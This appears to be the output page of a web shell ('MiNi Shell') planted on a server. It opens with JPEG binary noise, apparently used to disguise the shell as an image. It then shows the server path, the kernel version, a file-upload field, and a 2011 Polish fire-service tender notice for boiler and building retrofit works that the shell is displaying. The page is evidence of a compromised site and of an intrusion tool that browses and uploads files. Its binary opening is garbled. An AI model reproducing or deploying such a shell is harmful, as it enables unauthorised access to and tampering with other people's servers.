JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111026/280551-N-2011.html

<p class="kh_header"><b>Międzychód: Modernizacja kotłowni oraz termomodernizacja części 
magazynowo - warsztatowej w KP PSP Międzychód</b><br>
<b>Numer ogłoszenia: 280551 - 2011; data zamieszczenia: 26.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Powiatowa Państwowej Straży Pożarnej w Międzychodzie , ul. Zewnętrzna 4, 64-400 Międzychód, woj. wielkopolskie, tel. 095 7482074, faks 095 7482555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miedzychod.psp.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja kotłowni oraz termomodernizacja części 
magazynowo - warsztatowej w KP PSP Międzychód.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja kotłowni oraz wykonanie prac termomodernizacyjnych części magazynowo - warsztatowej. Zamówienie nie przekracza wartości 5 278 000 EURO. Szczegółowy zakres prac określa przedmiar robót. Zadanie podzielone jest na 2 części:
- część 1 - modernizacja kotłowni
- część 2 - termomodernizacja cząści magazynowo - warsztatowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.33.11.00-7, 45.33.11.10-0, 45.42.11.00-5, 45.42.11.48-3, 45.32.10.00-3, 45.42.11.60-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miedzychod.psp.wlkp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Powiatowa Państwowej Straży Pożarnej
ul. Zewnętrzna 4
64-400 Międzychód.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.11.2011 godzina 10:00, miejsce: Komenda Powiatowa Państwowej Straży Pożarnej
ul. Zewnętrzna 4
64-400 Międzychód.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja kotłowni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
	- odłączenie istniejących kotłów gazowych c.o.,
	- demontaż czopuchów starych kotłów,
	- przygotowanie konstrukcji (ramki) pod nowe kotły wiszące,
	- przygotowanie przyłączy do nowych kotłów (gaz, prąd, sieć co, odprowadzenie spalin),
- montaż wkładu kominowego ze stali chromoniklowej nierdzewnej o długości około 8 mb,
- przygotowanie i montaż nowych czopuchów do nowych kotłów,
	- posadowienie nowych kotłów gazowych, kaskada dwóch (2 szt.) kotłów kondensacyjnych o zakresie mocy każdy 10 - 50 kW (użyteczna sprawność cieplna przy mocy nominalnej/minimalnej 50/30 kW; 106/106,5 %), wymiennik ciepła ze stali nierdzewnej,


- podłączenie kotłów do przygotowanych instalacji, podłączenie zaworów, rozdzielaczy, armatury odcinającej i zabezpieczającej i innych urządzeń niezbędnych do prawidłowego funkcjonowania centralnego ogrzewania,
	- montaż nowych grzejników dwupłytowych, stalowych z termozaworami o wysokości 600-900 mm i długości 1200 mm (ilość grzejników - 18 szt.),
	- wykonanie wszelkich robót niezbędnych do prawidłowego zamontowania, uruchomienia i pracy kotłów c.o.,
	- przeprowadzenie próby kotłów na gorąco z dokonaniem regulacji centralnego ogrzewania,
	- przeszkolenie pracownika KP PSP Międzychód w zakresie obsługi zainstalowanych kotłów,
- udzielenie 5 lat gwarancji, serwis producenta: czas usunięcia awarii 24 h od zgłoszenia.

Oferent przed przygotowaniem i złożeniem oferty winien dokonać wizji lokalnej i uwzględnić w ofercie wszelkie roboty, materiały i sprzęt, jakie uzna za niezbędne do realizacji zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.11.00-7, 45.33.11.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Termomodernizacja części magazynowo - warsztatowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wymiana okien i drzwi zewnętrznych
Przedmiotem zamówienia jest:
- montaż nowych okien o parametrach:
- kolor biały PCV, lakiery akrylowe, okna z nawiewnikami,
- profil pięciokomorowy (wewnątrz stalowy profil),
- szerokość elementu min. 68 mm,
- minimum 2 uszczelki EPDM,
- szkło - termoizolacyjna szyba zespolona o współczynniku U - 1,1W/(m2*K),
- dwie szyby przedzielone ramką dystansową szerokości16 mm - termoramka,
- wypełnienie przestrzeni międzyszybowej argonem,
- okucie rozwieralno - uchylne (w oknach dwuskrzydłowych okucie w mniejszym skrzydle, drugie skrzydło stałe),
- typ okuć Siegenia lub Winkhaus,
- dane techniczne okien - Rw - 32 dB, R/a2 25-32 dB,
- gwarancja na konstrukcję min. 5 lat, 
- montaż ram w otworach na kotwy stalowe (min. 6 szt. na okno) i piankę montażową,
- wymiary wnęk okiennych i ilość okien do wymiany:
1380 x 1400 mm		21 szt.
1080 x 1400 mm		2 szt.
1380 x 1400 mm		14 szt.
1110 x 1400 mm		1 szt.
500 x 1400 mm		1 szt.
(ostatecznego obmiaru okien oferent dokona we własnym zakresie z uwzględnieniem parapetu zewnętrznego i jego wylewki, jeśli zajdzie taka potrzeba, do poziomu parapetów wewnętrznych, w celu wyeliminowania wolnej przestrzeni między parapetem a osadzoną nową ramą okienną)
- demontaż starych drzwi, 
- montaż nowych drzwi zewnętrznych o parametrach:
- skrzydło drzwi pełne - bez przeszklenia,
- futryna pełna na grubość ściany,
- minimum 2 zamki,
- zawiasy min. 3 szt.
- drzwi zewnętrzne z kształtowników z wysokoudarowego PCW w kolorze białym,
- izolacja termiczna max. 2 W/(m2*K) do ocieplenia zastosować piankę poliuretanową,
- próg metalowy nierdzewny (aluminium),
- minimum 2 uszczelki z EPDM, 
- montaż przy użyciu min. 8 kotw stalowych i pianki montażowej,
- drzwi do pomieszczeń kotłowni wykonane zgodnie z Polska Normą PN-B-02431-1
- wymiary wnęk oraz ilość drzwi:
920 x 2200 mm	1 szt.
920 x 2120 mm	2 szt.
920 x 2050 mm	1 szt. 
1520 x 2100 mm 	1 szt. (kotłownia; skrzydło główne 900 mm; skrzydło pomocnicze 620 mm zamykane ryglem góra-dół)
920 x 2100 mm	1 szt.

2. Wymiana bram garażowych
Przedmiotem zamówienia jest:		
- montaż nowych bram garażowych (2 szt.) o parametrach:
- bramy segmentowe, poziome przetłoczenia,
- wymiary: szer. 3600 mm, wys. 4100 mm,
- bramy z paneli z przeszkleniem stanowiącym 25 % powierzchni bramy, przeszklenie w 3 i 4 sekcji od dołu oknami (6 szt.) w ramach aluminiowych z wypełnieniem podwójnym akrylem 2,5 mm; typ 90 M 3-15-3 (dwa pasy przeszklone po trzy okna w sekcji,
- sekcje wypełnione pianką izolacyjną, wytwarzana metodą bezfreonową o współczynniku przenikania U mniejszy lub równy 1,
- sekcje pełne lakierowane od zewnątrz na kolor czerwony RAL 3000,
- system wyważenia na sprężynach skrętnych - 20 000 cykli,
- rolki nylonowe na łożyskach kulkowych,
- połączenia segmentów zawiasowe,
- prowadnice konstrukcyjne rolek - stalowe ocynkowane ogniwo,
- prowadzenie bramy w strefie podsufitowej,
- uszczelnienia dolne, górne i boczne zapewniające przepuszczalność powietrza klasy 2 zgodnie z PN EN 12426,
- okucia bram zabezpieczone antykorozyjnie,
- urządzenie blokujące bramę w przypadku pęknięcia sprężyny,
- zasuwa wewnętrzna - rygiel,
- w jednej z bram garażowych drzwi serwisowe umożliwiające wejście i wyjście z pomieszczenia bez konieczności podnoszenia całej bramy,
- bramy bez napędu elektrycznego, przystosowane do ewentualnego montażu napędu i automatyki w późniejszym czasie.

Przedstawione wymiary są poglądowe, a obmiaru ostatecznego oferent dokona we własnym zakresie z uwzględnieniem szczegółów określonych w SIWZ.


3. Ocieplenie ścian zewnętrznych
Przedmiotem zamówienia jest:
- wykonanie ocieplenia ścian metodą lekką mokrą z wykorzystaniem styropianu EPS 25 o grubości 15 cm, powierzchnia do ocieplenia: 596 m2 ,
- przygotowanie ścian poprzez usunięcie odpadającego tynku, uzupełnienie braków tynku, zabezpieczenie szczelin, pęknięć ścian, demontaż orynnowania, instalacji odgromowej i innych elementów, które wymagają demontażu w celu prawidłowego ułożenia styropianu, 
- ocieplenie ścian styropianem, mocowanie za pomocą kleju i kołków
- położenie warstwy zbrojeniowej - siatka z włókna szklanego zatopiona w kleju, 
- obróbka wnęk okiennych, drzwiowych, kanałów wentylacyjnych i innych elementów elewacji, 
- nałożenie tynku akrylowego lub inny CERESIT w kolorze DAKOTA DK2,
- montaż parapetów zewnętrznych w ilości 39 szt., parapety stalowe malowane proszkowo, kolor zgodny z parapetami w części administracyjno - biurowej (brąz), długość i szerokość parapetów dostosowana do wnęk okiennych i montowanych okien z uwzględnieniem ocieplenia styropianem.

Ostatecznego obmiaru wszystkich elementów elewacji budynku objętych zakresem prac oferent dokona we własnym zakresie.

4. Montaż opierzenia, rynien i innych elementów elewacji
Przedmiotem zamówienia jest:
- montaż nowego orynnowania (rynny długość 230 mb - o 125 mm, rury spustowe dł. 70 mb - o 90 mm, kolanka, haki), instalacji odgromowej, przeróbka pasa nadrynnowego, montaż nowych elementów opierzenia dostosowanego do grubości styropianu,
- przeróbka drabin (jeśli zajdzie taka potrzeba), 
- wymiana skrzynki układu pomiarowego zużycia gazu na nową,
- montaż pozostałych elementów elewacji zdemontowanych przez Wykonawcę przed ułożeniem styropianu.

5. Przeróbki wnęk okiennych i drzwiowych
Przedmiotem zamówienia jest:
- zamurowanie trzech (3 szt.) wnęk bram garażowych i pozostawienie, przygotowanie w ich miejscach otworów na cztery (4 szt.) okna w rozmiarze 1,38 x 1,38 m oraz 2 szt. drzwi zewnętrznych w rozmiarze 0,92 x 2,12 m,
- zmniejszenie wnęki drzwi do pomieszczeń warsztatowych do wymiaru 920 x 2120 mm,
- przeróbka wnęki okiennej na drzwiową o wymiarach 920 x 2050 mm (wejście do archiwum),
- przeróbka wnęki drzwiowej na okienną w wymiarach 500 x 1400 mm (wysokość nowego nadproża zgodna z pozostałymi oknami),
- zmniejszenie wnęki drzwiowej do wymiaru 920 x 2100 mm.

Ostatecznego obmiaru elementów objętych zakresem prac oferent dokona we własnym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.42.11.00-5, 45.42.11.48-3, 45.42.11.60-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com